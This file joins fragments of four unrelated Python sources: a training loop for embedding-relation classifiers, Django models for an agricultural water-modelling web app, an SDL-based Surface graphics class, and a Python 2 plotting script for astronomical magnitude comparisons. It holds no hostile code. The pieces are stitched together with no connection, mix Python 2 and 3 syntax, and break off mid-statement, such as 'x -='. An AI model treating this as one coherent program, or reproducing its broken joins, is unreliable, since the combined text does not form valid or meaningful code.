X, Y, ds_n, ds_tc, ds_tf = data_loader.load_single_data(fpath)
else:
X, Y, ds_n, ds_tc, ds_tf = data_loader.load_pair_data(fpath)
if train_input_disturber_for_vec:
train_input_disturber = train_input_disturber_for_vec(
data_loader.vecs.vectors)
else:
train_input_disturber = None
indim = X.shape[1]
msg = 'Expecting binary labels (0/1) but found max %d min %d' % (
torch.max(Y), torch.min(Y))
assert torch.max(Y) == 1 and torch.min(Y) == 0, msg
print("\n", rel_meta['file'])
epochs = epochs_from_trainset_size_fn(X.shape[0]) # from full dataset
trainloader, validloader, testloader = data_loader.split_data(
X, Y, seed=41)
my_model = _build_model(model, indim)
if odir_path:
modrun_odir = osp.join(odir_path, rel_type, rel_name,
loader_name, model, 'run_%02d' % run)
_store_raw_model(my_model, modrun_odir)
try:
trainer = train.ModelTrainer(my_model, cuda=cuda)
pretrain_test_result = trainer.test(testloader)
trainer.train(trainloader, validloader,
epochs_list=epoch_list_from_epochs(epochs),
input_disturber=train_input_disturber)
if odir_path:
_store_params(trainer.model, modrun_odir)
print('Finished %d epochs of training' % epochs)
test_df = trainer.test_df(testloader, debug=debug_test_df)
test_random_result = trainer.test_random(testloader)
model_result = {"model": model, "i": run, "emb": loader_name,
"epochs": epochs, "pos_exs": cnt,
"dataset_size": ds_n,
"dataset_tok_cnt": ds_tc,
"dataset_tok_found": ds_tf,
# "trainer": trainer,
"trainer_df": trainer.df, # to plot learning curve
"pretrain_test_result": pretrain_test_result,
"test_df": test_df,
"test_random_result": test_random_result}
model_results = emb_model_results.get(loader_name, [])
model_results.append(model_result)
emb_model_results[loader_name] = model_results
except:
print("Unexpected error executing %s:" % model, sys.exc_info()[0])
raise
# del trainer # cannot delete the trainer as we need it later on
del my_model
del trainloader
del validloader
del testloader
result = {"rel_name": rel_name, "rel_type": rel_type,
"pos_exs": cnt,
"emb_model_results": emb_model_results}
return result
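# Hypothetical end-to-end sketch (added; the loader object and paths are
# illustrative, not from the original repo):
#   rels_meta = load_rels_meta('data/rels')
#   result = learn_rel('data/rels', rels_meta.iloc[0],
#                      {'glove': glove_loader},  # a data_loader implementing load_pair_data etc.
#                      models=['logreg', 'nn3'], n_runs=3, odir_path='out/')
#   store_learn_result('out/summary', result)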
def store_learn_result(dir_path, learn_result):
"""Stores a learn_result in the specified dir_path
This is done by convention in subfolders
'reltype'/'rel_name'/'emb'/'model'/run_i/
Each subfolder will contain several files. See _store_embrun_result
"""
rel_path = osp.join(dir_path,
learn_result['rel_type'],
learn_result['rel_name'])
for emb in learn_result['emb_model_results']:
emb_path = osp.join(rel_path, emb)
for i, emb_result in enumerate(learn_result['emb_model_results'][emb]):
_store_embrun_result(emb_path, emb_result)
def load_learn_results(dir_path):
"""Loads all learn_results from a | |
import logging
import traceback
import decimal
import json
import numpy
import django
from django.db import models # we're going to geodjango this one - might not need it, but could make some things nicer
from django.db.models import Q
from django.contrib.auth.models import Group
from django.contrib.auth import get_user_model
User = get_user_model() # define user by this method rather than direct import - safer for the future
from guardian.shortcuts import assign_perm
from django.db.models.signals import post_save
from django.dispatch import receiver
from Waterspout import settings
import pandas
from Dapper import scenarios, get_version as get_dapper_version, worst_case
log = logging.getLogger("waterspout.models")
class SimpleJSONField(models.TextField):
"""
converts dicts to JSON strings on save and converts JSON to dicts
on load
"""
def get_prep_value(self, value):
return json.dumps(value)
def from_db_value(self, value, expression, connection):
if value is None:
return value # nullable columns come back as None, which json.loads cannot take
return json.loads(value)
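# Illustrative use (added sketch): a model can declare a SimpleJSONField and read
# or write plain Python objects transparently; the JSON round-trip happens in the
# field itself.
#
# class ExampleSettings(models.Model):   # hypothetical model, not in this file
#     data = SimpleJSONField(default=dict)
#
# obj = ExampleSettings.objects.create(data={"threshold": 0.5})
# ExampleSettings.objects.get(pk=obj.pk).data["threshold"]  # -> 0.5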
class UserProfile(models.Model):
"""
Basically just for user settings
"""
user = models.OneToOneField(User, related_name="profile", on_delete=models.CASCADE)
_serializer_fields = ["id", "user", "show_organization_model_runs", "show_organization_model_runs_tooltip",
"dense_tables", "dense_tables_tooltip"]
# basic settings
show_organization_model_runs = models.BooleanField(default=True)
show_organization_model_runs_tooltip = "By default, the application shows all model runs from within your organization" \
" and gives you the option to temporarily show only your model runs." \
" This setting changes that behavior so that, by default, you only see model runs" \
" that you created yourself and then you can temporarily change the listing to" \
" see all model runs in your organization."
dense_tables = models.BooleanField(default=False)
dense_tables_tooltip = "Use less spacing in tables to see more data on screen at the same time"
# set up the signal receivers that get triggered after a user is created so that everyone has a userprofile
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
new_profile = UserProfile.objects.create(user=instance)
assign_perm("change_userprofile", instance, new_profile)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
class Organization(models.Model):
"""
Since this application is designed to support multiple models, possibly in the same instance, make most things
be ties to an "organization" of some kind - we'll include users in the organization and arrange permissions
around users within the organization.
We could have made this a subclass of the Group object, but then reverse relationships may not work correctly.
Instead we'll just attach a Group via a one-to-one relationship and manage membership through it.
"""
name = models.CharField(max_length=255, null=False, blank=False)
# TODO: This shouldn't allow nulls or blanks in the future
group = models.OneToOneField(Group, on_delete=models.DO_NOTHING, null=True, blank=True)
def has_member(self, user):
return self.group in user.groups.all() # True if this group is in that set, otherwise, False
def add_member(self, user):
self.group.user_set.add(user)
self.group.save()
def __str__(self):
return f"Organization: {self.name}"
class ModelArea(models.Model):
"""
This would be something like "The Delta", or "Washington" - mostly, this will be one to one with organizations,
but just in case we want to be able to deploy multiple models for an organization in the future, we'll store it
this way.
"""
organization = models.ForeignKey(Organization, null=True, blank=True, on_delete=models.SET_NULL, related_name="model_areas")
name = models.CharField(max_length=255, unique=True)
data_folder = models.CharField(max_length=255, default="dap") # which folder did the data for this come from during loading? Can
# help us if we want to update some data later
description = models.TextField(null=True, blank=True)
# preferences reverse 1 to 1
map_center_latitude = models.DecimalField(max_digits=4, decimal_places=2)
map_center_longitude = models.DecimalField(max_digits=5, decimal_places=2)
map_default_zoom = models.SmallIntegerField()
# these values define the ranges available when creating a model run in this region
min_water = models.PositiveSmallIntegerField(default=50)
max_water = models.PositiveSmallIntegerField(default=120)
min_rainfall = models.PositiveSmallIntegerField(default=10)
max_rainfall = models.PositiveSmallIntegerField(default=200)
min_land = models.PositiveSmallIntegerField(default=50)
max_land = models.PositiveSmallIntegerField(default=100)
min_price = models.PositiveSmallIntegerField(default=80)
max_price = models.PositiveSmallIntegerField(default=120)
min_yield = models.PositiveSmallIntegerField(default=80)
max_yield = models.PositiveSmallIntegerField(default=120)
min_crop_area = models.PositiveSmallIntegerField(default=0)
max_crop_area = models.PositiveSmallIntegerField(default=200)
main_help_page_content = models.TextField(null=True, blank=True)
feature_package_name = models.CharField(max_length=100, default="DEFAULT")
def __str__(self):
return self.name
@property
def model_defaults(self):
# Just making it a dict so that it comes out of the serializer grouped
return {
"min_water": self.min_water,
"max_water": self.max_water,
"min_rainfall": self.min_rainfall,
"max_rainfall": self.max_rainfall,
"min_land": self.min_land,
"max_land": self.max_land,
"min_price": self.min_price,
"max_price": self.max_price,
"min_yield": self.min_yield,
"max_yield": self.max_yield,
"min_crop_area": self.min_crop_area,
"max_crop_area": self.max_crop_area,
}
# elasticities code commented out because we don't run calibration
# ourselves right now
#@property
#def elasticities_as_dict(self):
# return {item.crop.crop_code: float(item.value) for item in self.elasticities}
@property
def supports_rainfall(self):
return self.region_set.filter(supports_rainfall=True).exists()
@property
def supports_irrigation(self):
return self.region_set.filter(supports_irrigation=True).exists()
@property
def background_code(self):
# this is a bit of a hack, but we're using the folder
# names as a class to set the backgrounds temporarily
return self.data_folder
class ModelAreaPreferences(models.Model):
"""
This model is so that we can group preferences and features for model areas
and keep them organized
"""
# should all users of this model area be able to see the model runs of all other users?
shared_model_runs = models.BooleanField(default=True)
# prevent users from reducing price/yield below the value that would make profits negative
# basically forces stormchaser to create cards for crops when All Crops
# goes to negative profits for the crop
enforce_price_yield_constraints = models.BooleanField(default=True)
# if True, and the user makes an adjustment that would create
# negative profits, it forces the slider they weren't using upward as they move the other
# downward. If False, it's purely advisory
lock_price_yield_ratio = models.BooleanField(default=False)
# Should visualizations and downloads include net revenues for this model area? By default we
# don't want to - in most cases, it won't be something we want people to see - but we'll want
# it to be able to be accessed for debugging purposes
include_net_revenue = models.BooleanField(default=False)
# should region-linking of crops be enabled?
region_linked_crops = models.BooleanField(default=False)
# whether or not to show the ability to view model run creation code
allow_model_run_creation_code_view = models.BooleanField(default=False)
# flags to indicate an entire set of features in data visualization
# where they can choose additional model runs for comparison,
# can normalize to a base run, and can see worst case outcomes
allow_viz_multiple_comparisons = models.BooleanField(default=False)
allow_viz_normalization = models.BooleanField(default=False)
allow_viz_region_filter = models.BooleanField(default=False)
allow_viz_worst_case = models.BooleanField(default=False)
allow_static_regions = models.BooleanField(default=False)
allow_removed_regions = models.BooleanField(default=False)
allow_linear_scaled_regions = models.BooleanField(default=False)
use_default_region_behaviors = models.BooleanField(default=True)
model_area = models.OneToOneField(ModelArea,
on_delete=models.CASCADE,
related_name="preferences"
)
# set up the signal receivers that get triggered after a model area is created so that every model area has a preferences object
@receiver(post_save, sender=ModelArea)
def create_model_area_preferences(sender, instance, created, **kwargs):
if created:
ModelAreaPreferences.objects.create(model_area=instance)
@receiver(post_save, sender=ModelArea)
def save_model_area(sender, instance, **kwargs):
instance.preferences.save()
#class Elasticity(models.Model):
# elasticities code commented out because we don't run calibration
# ourselves right now
# """
# We store elasticities for Dapper as individual records here,
# but we'll access them on the ModelArea object to send to Dapper
# """
# model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE, related_name="elasticities")
# crop = models.ForeignKey("Crop", on_delete=models.CASCADE, related_name="elasticities")
# value = models.DecimalField(max_digits=6, decimal_places=4)
class RegionGroup(models.Model):
name = models.CharField(max_length=255, null=False, blank=False)
internal_id = models.CharField(max_length=100, null=False, blank=False) # typically we have some kind of known ID to feed to a model that means something to people
model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE)
geometry = models.JSONField(null=True, blank=True) # this will just store GeoJSON and then we'll combine into collections manually
class Region(models.Model):
MODELED = 0
REMOVED = 1
FIXED = 2
LINEAR_SCALED = 3
REGION_DEFAULT_MODELING_CHOICES = (
(MODELED, "Modeled"),
(REMOVED, "Removed"),
(FIXED, "Fixed"),
(LINEAR_SCALED, "Linear Scaled"),
)
class Meta:
unique_together = ['name', 'model_area']
indexes = [
models.Index(fields=("internal_id",)),
models.Index(fields=("model_area_id", "supports_rainfall",)), # we'll use these to set an attribute whenever someone loads a model area
models.Index(fields=("model_area_id", "supports_irrigation",))
]
name = models.CharField(max_length=255, null=False, blank=False)
internal_id = models.CharField(max_length=100, null=False, blank=False) # typically we have some kind of known ID to feed to a model that means something to people
external_id = models.CharField(max_length=100, null=True, blank=True) # a common external identifier of some kind
description = models.TextField(null=True, blank=True)
# .extra_attributes reverse lookup
# .modifications reverse lookup
default_behavior = models.SmallIntegerField(default=MODELED, choices=REGION_DEFAULT_MODELING_CHOICES)
geometry = models.JSONField(null=True, blank=True) # this will just store GeoJSON and then we'll combine into collections manually
model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE)
group = models.ForeignKey(RegionGroup, null=True, blank=True, on_delete=models.CASCADE) # there could be a reason to make it a many to many instead, but
# I can't think of a use case right now, and it'd require some PITA
# logic to tease apart specifications for regions in overlapping groups
supports_rainfall = models.BooleanField(default=False) # whether or not this region has any rainfall/dryland components
supports_irrigation = models.BooleanField(default=True) # whether or not this region has any irrigated components
serializer_fields = ("id", "name", "internal_id", "description", "geometry", "model_area", "group",
"supports_rainfall", "supports_irrigation", "multipliers", "default_behavior",
"MODELED", "FIXED", "REMOVED", "LINEAR_SCALED")
def __str__(self):
return "Area {}: Region {}".format(self.model_area.name, self.name)
class RegionMultipliers(models.Model):
region = models.OneToOneField(Region, on_delete=models.CASCADE, related_name="multipliers")
total_revenue = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
direct_value_add = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
total_value_add = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
direct_jobs = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
total_jobs = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
class RegionExtra(models.Model):
"""
Extra custom attributes that can be set per region instance, available by filtering
`region.extra_attributes.filter(name="{attribute_name}")`, for example.
"""
region = models.ForeignKey(Region, on_delete=models.CASCADE, related_name="extra_attributes")
name = models.CharField(max_length=255, null=False, blank=False)
value = models.TextField(null=True, blank=True)
data_type = models.CharField(max_length=5) # indicates the Python data type to cast it to if it's not a string
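# A hypothetical helper (not part of the original module) sketching how the
# `data_type` code above could be used to recover a typed value from a
# RegionExtra row; the short codes assumed here ("int", "float", "bool") are
# illustrative guesses, since the model only fixes the field's max length.
def cast_region_extra_value(extra):
    casters = {
        "int": int,
        "float": float,
        "bool": lambda v: v in ("True", "true", "1"),
    }
    # unknown or "str" codes fall through and return the raw TextField value
    return casters.get(extra.data_type, lambda v: v)(extra.value)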
class Crop(models.Model):
"""
    A single unit for individual crops. Note that we need to pull crops by organization - the same crop could
    exist for multiple organizations. We don't load them once for all organizations because then we would have
    to worry about whether a crop means exactly the same thing across organizations, what changes mean to each
    group, and so on. Let's keep it at a known, manageable level of complexity and assign crops to organizations,
    even if that means duplicating crops between organizations.
"""
class Meta:
unique_together = ['crop_code', 'model_area']
indexes = [
models.Index(fields=("name",))
]
name = models.CharField(max_length=255, null=False, blank=False) # human readable crop name
crop_code = models.CharField(max_length=30, null=False, blank=False) # code used in the models (like ALFAL for Alfalfa)
    model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE)  # deleting a model area clears any crops for it
# TiberiumN/gsdl2 - gsdl2/surface.py
# TODO: __all__ = []
from collections import namedtuple
import logging
from gsdl2 import sdl, ffi
from gsdl2.sdlconstants import get_sdl_byteorder
from gsdl2.sdlconstants import SDL_BYTEORDER, SDL_LIL_ENDIAN, SDL_BIG_ENDIAN, SDL_MUSTLOCK
from gsdl2 import sdlpixels, SDLError
from gsdl2.rect import Rect, sdl_rect_from_rect, game_rect_from_obj
from gsdl2.locals import palette_8bit, Color
from gsdl2.surflock import locked
PixelFormat = namedtuple('PixelFormat', 'format palette bitsperpixel bytesperpixel' +
' rmask gmask bmask amask rloss gloss bloss aloss rshift gshift bshift ashift refcount next')
PixelPalette = namedtuple('PixelPalette', 'ncolors color')
# Color = namedtuple('Color', 'r g b a')
class Surface(object):
__src_rect = Rect(0, 0, 1, 1)
__dst_rect = Rect(0, 0, 1, 1)
def __init__(self, size_or_surf, flags=0, depth=0, masks=None, surface=None):
if depth == 0:
depth = 32
if not masks:
masks = [0] * 4
do_blit = False
if isinstance(size_or_surf, Surface):
surf = size_or_surf
width, height = surf.get_size()
flags = surf.get_flags()
depth = surf.get_bitsize()
self._sdl_surface = sdl.createRGBSurface(flags, width, height, depth, *masks)
do_blit = True
else:
            if surface is None:
                # no wrapped SDL surface was passed in: build one from the (width, height) pair
                width, height = [int(val) for val in size_or_surf]
self._sdl_surface = sdl.createRGBSurface(flags, width, height, depth, *masks)
else:
self._sdl_surface = surface
if depth == 8:
palette_colors = sdl.ffi.cast('SDL_Color *', self._sdl_surface.format.palette.colors)
for i in range(256):
c = palette_colors[i]
c.r, c.g, c.b, c.a = palette_8bit[i]
if do_blit:
self.blit(size_or_surf, (0, 0))
def get_size(self):
surf = self._sdl_surface
return surf.w, surf.h
size = property(get_size)
def get_width(self):
return self._sdl_surface.w
width = property(get_width)
w = width
    def get_height(self):
        return self._sdl_surface.h
height = property(get_height)
h = height
def get_flags(self):
return self._sdl_surface.flags
flags = property(get_flags)
def get_masks(self):
f = self._sdl_surface.format
return f.Rmask, f.Gmask, f.Bmask, f.Amask
masks = property(get_masks)
def get_bitsize(self):
return self._sdl_surface.format.BitsPerPixel
bitsize = property(get_bitsize)
def get_colorkey(self):
surface = self._sdl_surface
c = Color(0, 0, 0, 0)
sdl.getColorKey(surface, c.sdl_color)
return c
def set_colorkey(self, color, flag=1):
"""set flag=1 to enable, flag=0 to disable"""
surface = self._sdl_surface
map_color = sdl.mapRGBA if len(color) == 4 else sdl.mapRGB
sdl.setColorKey(surface, flag, map_color(surface.format, *color))
colorkey = property(get_colorkey, set_colorkey)
    def get_blendmode(self):
        cdata = sdl.ffi.new('SDL_BlendMode *')
        # blend mode on a Surface goes through the surface API, not the texture API
        sdl.getSurfaceBlendMode(self._sdl_surface, cdata)
        value = int(cdata[0])
        return value
    def set_blendmode(self, mode):
        sdl.setSurfaceBlendMode(self._sdl_surface, mode)
    blendmode = property(get_blendmode, set_blendmode)
def get_rect(self, **kwargs):
"""get_rect(rect=outrect, **{setattrs}) -> Rect
If a rect is provided, its values are updated and it is returned. If rect is not provided, a new one will be
constructed. The remaining kwargs are rect attributes to set.
:param kwargs: rect=outrect, x=N, y=N, center=(X, Y), etc.
:return:
"""
if 'rect' in kwargs:
r = kwargs['rect']
else:
w, h = self.get_size()
r = Rect(0, 0, w, h)
for k, v in kwargs.items():
setattr(r, k, v)
return r
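    # Illustrative usage (not in the original source): kwargs are applied after
    # the rect is created or fetched, so both forms below work:
    #
    #   r = surf.get_rect(center=(320, 240))  # new Rect, recentered
    #   surf.get_rect(rect=r, x=0)            # updates r in place and returns it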
def get_abs_offset(self):
""" get_abs_offset() -> (x, y)
find the absolute position of a child subsurface inside its top level parent
"""
if False:
# FIXME: Implement this
subsurf = None
owner = subsurf.owner
offsetx, offsety = subsurf.xoffset, subsurf.yoffset
while owner.subsurfacedata:
subsurf = owner.subsurfacedata
owner = subsurf.owner
offsetx += subsurf.xoffset
offsety += subsurf.yoffset
return (offsetx, offsety)
return (0, 0)
def get_bounding_rect(self, min_alpha=1):
""" get_bounding_rect(min_alpha = 1) -> Rect
find the smallest rect containing data
"""
min_alpha = int(min_alpha)
if min_alpha > 255:
min_alpha = 255
elif min_alpha < 0:
min_alpha = 0
r, g, b, a = (ffi.new('uint8_t *'), ffi.new('uint8_t *'),
ffi.new('uint8_t *'), ffi.new('uint8_t *'))
format = self.sdl_surface.format
        key = ffi.new('uint32_t *')
        if sdl.getColorKey(self.sdl_surface, key) == 0:
            # SDL_GetColorKey returns 0 only when a colorkey is actually set
            keyr = ffi.new('uint8_t *')
            keyg = ffi.new('uint8_t *')
            keyb = ffi.new('uint8_t *')
            sdl.getRGBA(key[0], format, keyr, keyg, keyb, a)
            keyr, keyg, keyb = keyr[0], keyg[0], keyb[0]
        else:
            keyr = keyg = keyb = None
min_x, min_y, max_x, max_y = 0, 0, self.w, self.h
def check_alpha(x, y):
value = self.get_at((x,y))
sdl.getRGBA(value, format, r, g, b, a)
if (keyr is None and a[0] >= min_alpha) or \
(keyr is not None and (r[0] != keyr or
g[0] != keyg or
b[0] != keyb)):
return True
return False
with locked(self.sdl_surface):
found_alpha = False
for y in range(max_y - 1, -1, -1):
for x in range(min_x, max_x):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
max_y = y
found_alpha = False
for x in range(max_x - 1, -1, -1):
for y in range(min_y, max_y):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
max_x = x
found_alpha = False
for y in range(min_y, max_y):
min_y = y
for x in range(min_x, max_x):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
found_alpha = False
for x in range(min_x, max_x):
min_x = x
for y in range(min_y, max_y):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
return Rect._from4(min_x, min_y, max_x - min_x, max_y - min_y)
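    # Illustrative usage (not in the original source): trim a sprite down to
    # its visible pixels, e.g.
    #
    #   visible = sprite.get_bounding_rect(min_alpha=1)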
def get_at(self, pos):
        # TODO: I think this is causing random segfaults
x, y = pos
surf = self._sdl_surface
format = surf.format
bpp = format.BytesPerPixel
pixels = surf.pixels
rgba = sdl.ffi.new('Uint8 [4]')
if SDL_MUSTLOCK(surf):
if not self.lock():
return
# TODO: not well tested
if bpp == 1:
pixels = sdl.ffi.cast('Uint8 *', pixels)
color_ = pixels[y * surf.w + x]
elif bpp == 2:
pixels = sdl.ffi.cast('Uint16 *', pixels)
color_ = pixels[y * surf.w + x]
        elif bpp == 3:
            pixels = sdl.ffi.cast('Uint8 *', pixels)
            base = y * surf.pitch + x * 3
            if SDL_BYTEORDER == SDL_LIL_ENDIAN:
                color_ = pixels[base] | (pixels[base + 1] << 8) | (pixels[base + 2] << 16)
            else:
                color_ = pixels[base + 2] | (pixels[base + 1] << 8) | (pixels[base] << 16)
else: # bpp == 4
pixels = sdl.ffi.cast('Uint32 *', pixels)
color_ = pixels[y * surf.w + x]
self.unlock()
sdl.getRGBA(color_, format, rgba, rgba + 1, rgba + 2, rgba + 3)
# TODO: return tuple instead?
return Color(*rgba)
def set_at(self, pos, color_):
x, y = pos
surf = self._sdl_surface
pixels = surf.pixels
surf_format = surf.format
bpp = surf_format.BytesPerPixel
if not isinstance(color_, Color):
color_ = Color(*color_)
if (x < surf.clip_rect.x or x >= surf.clip_rect.x + surf.clip_rect.w or
y < surf.clip_rect.y or y >= surf.clip_rect.y + surf.clip_rect.h):
# out of clip area
return
if SDL_MUSTLOCK(surf):
if not self.lock():
return
c = sdl.mapRGBA(surf_format, color_.r, color_.g, color_.b, color_.a)
if bpp == 1:
buf = sdl.ffi.cast('Uint8 *', pixels)
buf[y * surf.w + x] = c
elif bpp == 2:
buf = sdl.ffi.cast('Uint16 *', pixels)
buf[y * surf.w + x] = c
elif bpp == 3:
# TODO: test 24 bit
buf = sdl.ffi.cast('Uint8 *', pixels)
rgb = sdl.ffi.new('Uint8 [4]')
color = sdl.ffi.cast('Uint32 *', color_.sdl_color)
sdl.getRGB(color[0], surf.format, rgb, rgb + 1, rgb + 2)
byte_buf = buf + y * surf.pitch + x * 3
if SDL_BYTEORDER == SDL_BIG_ENDIAN:
byte_buf[0] = rgb[0]
byte_buf[1] = rgb[1]
byte_buf[2] = rgb[2]
else:
byte_buf[2] = rgb[0]
byte_buf[1] = rgb[1]
byte_buf[0] = rgb[2]
else: # bpp == 4
buf = sdl.ffi.cast('Uint32 *', pixels)
buf[y * surf.w + x] = c
self.unlock()
def fill(self, color, rect=None, special_flags=0):
surface = self._sdl_surface
map_color = sdl.mapRGBA if len(color) == 4 else sdl.mapRGB
if SDL_MUSTLOCK(surface):
self.lock()
if rect is None:
size = self.get_size()
self.__src_rect[:] = 0, 0, size[0], size[1]
# rect = Rect(0, 0, size[0], size[1])
rect = self.__src_rect
elif not isinstance(rect, Rect):
# rect = Rect(*rect)
self.__src_rect[:] = rect
rect = self.__src_rect
rect = sdl_rect_from_rect(rect)
sdl.fillRect(surface, rect, map_color(surface.format, *color))
self.unlock()
# return Rect() # rather a tuple?
def blit(self, source, dest_rect, area=None, special_flags=0):
dest_surface = self._sdl_surface
if SDL_MUSTLOCK(dest_surface):
self.lock()
if area is None:
size = source.get_size()
# area = Rect(0, 0, int(size[0]), int(size[1]))
area = self.__src_rect
area[:] = 0, 0, size[0], size[1]
elif not isinstance(area, Rect):
# area = Rect(*area)
self.__src_rect[:] = area
area = self.__src_rect
if not isinstance(dest_rect, Rect):
# dest_rect = Rect(dest_rect)
size = source.get_size()
d = self.__dst_rect
d.topleft = dest_rect[0:2]
d.size = size
dest_rect = d
area = sdl_rect_from_rect(area)
dest_rect = sdl_rect_from_rect(dest_rect)
sdl.upperBlit(source.sdl_surface, area, dest_surface, dest_rect)
self.unlock()
def blit_scaled(self, source, dest_rect, area=None):
dest_surface = self._sdl_surface
if SDL_MUSTLOCK(dest_surface):
self.lock()
if area is None:
size = source.get_size()
area = self.__src_rect
area[:] = 0, 0, int(size[0]), int(size[1])
elif not isinstance(area, Rect):
self.__src_rect[:] = area
area = self.__src_rect
sdl_dest_rect = self.__dst_rect.sdl_rect
x, y, w, h = [int(n) for n in dest_rect]
# The following adjustment is intended to prevent jiggling which occurs when the size is an odd unit.
if w % 2:
            x -=
linestyle=':')
### Values to plot ###
deltam, hax_mag, bins = normalize_plot(norm_delta_mag_list=norm_dm_list, bins=bins, hax_mag_list=hax_mag_list)
# Labels and appearance #
plt.ylabel('('+str(mag_axlabel1) + ' - ' + str(mag_axlabel2)+') / '+ '$\sigma$', fontsize=8)
### For scatter plot ###
if NORMALIZE is False:
# Values to plot #
deltam = np.array(clean_magnitude1) - np.array(clean_magnitude2)
if SWAP_HAX:
hax_mag = clean_magnitude2
if SWAP_HAX is False:
hax_mag = clean_magnitude1
# Labels and appearance #
plt.ylabel(str(mag_axlabel1) + ' - ' + str(mag_axlabel2), fontsize=9)
### 1-sigma curve ###
if PLOT_1SIG:
hax, vax, err, bins = bin_and_cut_measured_magnitude_error(error1=error1, error2=error2, clean_magnitude1=clean_magnitude1, clean_magnitude2=clean_magnitude2, filter_name=filter_name)[:4]
        ### Remove placeholder entries (None) from x, y, and err (these marked magnitude bins that contained no objects) ###
err[:] = [temp for temp in err if temp is not None]
hax[:] = [temp for temp in hax if temp is not None]
vax[:] = [temp for temp in vax if temp is not None]
### Plot 1-sigma curve ###
plt.plot(hax, np.array(vax) + np.array(err), color='red', linestyle='-', linewidth=0.7, label='$1 \sigma_{mag\_meas}$')
plt.plot(hax, np.array(vax) - np.array(err), color='red', linestyle='-', linewidth=0.7)
### Write to log files to record the number of objects plotted and the number of objects within 1sigma ###
logger(delta_mag=deltam, filter_name=filter_name, clean_magnitude1=clean_magnitude1, full_magnitude1=full_magnitude1, realization_number=realization_number, tile_name=tile_name, bins=bins, hax_mag=hax_mag)
if PRINTOUTS:
print 'Plotting ', len(clean_magnitude1), ' objects ... \n'
### Plot ###
# One colorbar at a time. This error is caught at beginning of script #
if CM_T_S2N_COLORBAR is False and BIN_CM_T_S2N is False and CM_T_COLORBAR is False and CM_T_ERR_COLORBAR is False:
plt.scatter(hax_mag, deltam, color=get_color(filter_name=filter_name)[0], alpha=0.25, s=0.25)
if CM_T_S2N_COLORBAR or CM_T_ERR_COLORBAR or CM_T_COLORBAR:
'''To plot only the worst (smallest) s2n ratio:
plt.scatter(np.array(hax_mag)[idx_list[0]], np.array(deltam)[idx_list[0]], color='purple', alpha=1, s=1, label='%1.f'%bins[0]+'<cm_T_s2n<%1.f'%bins[1])
'''
plt.scatter(hax_mag, deltam, c=cbar_val, alpha=0.25, s=0.25, norm=matplotlib.colors.LogNorm(), cmap='gist_rainbow')
plt.colorbar(label=cbar_axlabel)
if BIN_CM_T_S2N:
colors = ['green', 'purple', 'cyan', 'orange', 'pink', 'yellow', 'black', 'blue']
for i in np.arange(0, len(idx_list)):
plt.scatter(np.array(hax_mag)[idx_list[i]], np.array(deltam)[idx_list[i]], color=colors[i], alpha=0.25, s=0.25, label='%1.f'%bins[i]+'<cm_T_s2n<%1.f'%bins[i+1])
if HEXBIN:
if NORMALIZE:
grid = (100, 1000)
if PRINTOUTS:
print ' Normalized hexbin has a large number of grid cells. Will take a moment to plot ... \n'
if NORMALIZE is False:
grid = 100
plt.hexbin(hax_mag, deltam, gridsize=grid, cmap=get_color(filter_name=filter_name)[1], bins='log')
plt.colorbar(label='log(counts)')
# Labels and appearance #
if SWAP_HAX:
plt.xlabel(str(mag_axlabel2), fontsize=9)
if SWAP_HAX is False:
plt.xlabel(str(mag_axlabel1), fontsize=9)
plt.axhline(y=0.0, color='k', linestyle=':', linewidth=0.5)
if YLOW is not None and YHIGH is not None:
plt.ylim([YLOW, YHIGH])
### Plot legend ###
if PLOT_1SIG and BIN_CM_T_S2N is False:
plt.legend(fontsize=8).draggable()
if BIN_CM_T_S2N:
# Increase marker size and opacity in legend #
lgnd = plt.legend(markerscale=4, fontsize=8)
for l in lgnd.legendHandles:
l.set_alpha(1)
if SUBPLOT is False:
plot_name = plot_name.replace('griz', filter_name)
### Save plot ###
if SAVE_PLOT:
print '-----> Saving plot as: ', plot_name
plt.savefig(plot_name)
if SHOW_PLOT:
plt.title(plot_title)
plt.show()
return 0
def subplotter(df, flag_idx, mag_hdr1, mag_hdr2, mag_err_hdr1, mag_err_hdr2, plot_name, plot_title, realization_number, tile_name):
"""Combine four subplots into a single plot with four panels (2-by-2). Declare variables needed for plotting.
Args:
*_hdr (str) -- Headers refer to columns in the matched catalog.
df (pandas DataFrame)
plot_name (str) -- Path and name for the plot. Used when save_plot is True and normalize is False.
        realization_number (int) -- Allowed values: 0, 1, 2, None. Refers to the Balrog injection realization; None refers to a one-realization run.
Returns:
flag_idx (list of ints) -- If log_flags is True, will check for all nonzero flag values in `FLAG_HDR_LIST` and `flag_idx` will contain indices that have nonzero flag values. Will be empty if LOG_FLAGS is False.
"""
# Counter for flag type() printout #
counter_flag_type_printout = 0
    ### Create 2-by-2 subplot grid ###
counter_subplot = 1
# Figure size units: inches #
plt.figure(figsize=(10, 8))
### Create one subplot for each griz filter ###
for f in ALL_FILTERS:
### Define variables ###
cbar_val, cbar_idx_list, cbar_bins, err1, err2, cleanmag1, cleanmag2, index_good, cbar_axlabel, fullmag1, mag_axlabel1, mag_axlabel2 = get_plot_variables(filter_name=f, df=df, mag_hdr1=mag_hdr1, mag_hdr2=mag_hdr2, mag_err_hdr1=mag_err_hdr1, mag_err_hdr2=mag_err_hdr2, realization_number=realization_number, tile_name=tile_name, mag_axlabel1=M_AXLABEL1, mag_axlabel2=M_AXLABEL2)
### Subplot ###
if SUBPLOT:
plt.subplot(2, 2, counter_subplot)
